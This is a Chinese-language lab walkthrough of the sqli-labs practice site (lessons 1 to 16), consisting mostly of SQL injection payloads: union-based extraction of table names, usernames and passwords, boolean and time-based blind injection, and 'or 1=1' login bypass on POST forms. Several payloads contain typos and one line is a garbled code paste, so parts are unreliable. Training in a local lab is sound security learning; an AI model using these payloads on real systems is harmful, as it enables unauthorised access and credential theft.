GET传参(参数id)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=2-1
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=2
发现id=2与id=2-1相同,可以判断出绝不是数字型,故为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’
可以判断出为 ‘ 闭合
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’–+
接下来判断列数(group/order by +二分法)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’group by 5–+
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’group by 3–+
判断回显位(注意此处?id=-1’)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,3–+
发现2,3为回显位
爆数据库名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,user(),database()–+
爆表名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+
爆users表中的列名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’–+
爆username和password的数据
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’ union select 1,2,group_concat(username ,id , password) from users–+
相比于Less-1,Less-2中的id缺少’’
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-2/?id=1
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-2/?id=2-1
Id=1与id=2-1结果相同,只有数字型符合此条件
数字型不用判断闭合方式,接下来列数,回显位以及各种宝库与Less-1一模一样,在此不再赘述。
代码审计发现闭合方式不同
首先判断为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-3/?id=1’
两个红色构成 ’) 闭合
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-3/?id=1’)–+
接下来与Less-1爆库一模一样
两处:
$id = ‘"’ . i d . ′ " ′ ; / / 用”“包裹 i d 参数 i d = ( id . '"'; //用”“包裹id参数 id=( id.′"′;//用”“包裹id参数id=(id) LIMIT 0,1"; //用()包裹id参数
Ok,那我首先判断为字符型,然后判断闭合方式
输入?id=1’ 和 ?id=1’)都没有报错
当我输入?id=1"时报错
可以判断出闭合方式为 ”)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-4/?id=1")–+
接下来与Less-1爆库一模一样
查看源码,感觉没啥特殊的
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=-1
通过这两个payload发现页面只有True和False
可以采用布尔盲注和时间盲注
首先根据页面真假值判断为字符型及闭合方式
采取布尔盲注
id=1’ and ascii(substr(‘查询语句’,1,1))>97 --+
加上二分法,可以对database()的字符进行逐个判断
或者通过pythoni脚本来判断
查询表名
?id=-1’ ascii(substr((select tabel_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100–+
查询列名
?id=-1’ ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),1,1))>100–+
查询用户名和密码
?id=-1’ ascii(substr((select username from users limit 0,1),1,1))>100–+
?id=-1’ ascii(substr((select password from users limit 0,1),1,1))>100–+
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=1
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=-1
Less-6也是,盲注
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=1"–+
字符型,闭合方式为 “
除了闭合方式,其他都与Less-5一模一样
逐个测试,发现只有当闭合方式为’))时,页面回显True
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=1’))–+
盲注
除了闭合方式,其他都与Less-5一模一样
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1’–+
判断为字符型和 ‘ 闭合
盲注
除了闭合方式,其他都与Less-5一模一样
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=-1
发现不管输入啥值,页面没变化
可以采用时间盲注 if+sleep()
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1’ and sleep(3)–+
判断出闭合方式为 ‘
查询表名
?id=-1’ and if(ascii(substr((select tabel_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(0),sleep(3))–+
查询列名
?id=-1’ and if(ascii(substr((seecet column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),1,1))>100,sleep(0),sleep(3))–+
查询用户名和密码
?id=-1’ and if(ascii(substr((select username from users limit 0,1),1,1))>100,sleep(0),sleep(3))–+
?id=-1’ and if(ascii(substr((select password from users limit 0,1),1,1))>100,sleep(0),sleep(3))–+
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id=1 and sleep(3)–+
不会执行sleep(3),判断出为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id=1" and sleep(3)–+
会执行sleep(3),判断闭合方式为 “
其他都和Less-9一模一样
从这一关开始为POST提交,通过代码审计发现,POST参数有两个,分别是uname和passwd
uname=1&passwd=1
uname=1’
&passwd=1
判断出闭合方式为 ‘
uname=1’ group by 3 #
&passwd=1
法一:
页面有报错回显,可以进行报错注入
爆出用户名和密码
法二:
使用万能密钥,绕过代码验证逻辑
uname=1’or 1=1 #
&passwd=1
uname=1"
&passwd=1
页面报错,判断出为 “) 闭合
构造万能密钥
uname=1") or 1=1#
&passwd=1
刚刚测试了一下发现也可以采用报错注入进行操作
uname=1’
&passwd=1
闭合方式为 ‘)
法一:
构造万能密钥
uname=1’) or 1=1 #
&passwd=1
uname=1’) union select 1,2 #
&passwd=1
法二:
这一关没有报错回显,那我可以采取sleep()进行时间盲注
uname=1"
&passwd=1
判断出闭合方式为 “
uname=1" or 1=1 #
&passwd=1
这一关依旧没有回显,但是sleep()也不能执行,有可能被过滤了,前面几关也有可能被过滤了,难受
发现使用union select+sleep()可以执行,而and+sleep()不能执行,不知道为啥!!!
uname=1" union select 1,if(ascii(substr(database(),2,1))> 100,sleep(3),0) #
&passwd=1
第十五关和第十一关一样,只是不产生报错信息。这就是明显的布尔盲注。因为还有错误页面和正确页面进行参考。
直接构造万能密钥
uname=1’ or 1=1 #
&passwd=1
简单测试了一下,布尔盲注也可以
uname=1’ union select 1,ascii(substr(database(),1,1))>97 #
&passwd=1
然后可以采用python脚本
uname=1") or 1=1 #
&passwd=1
uname=1") union select 1,ascii(substr(database(),1,1))>97 #
&passwd=1
也以采用布尔盲注进行注入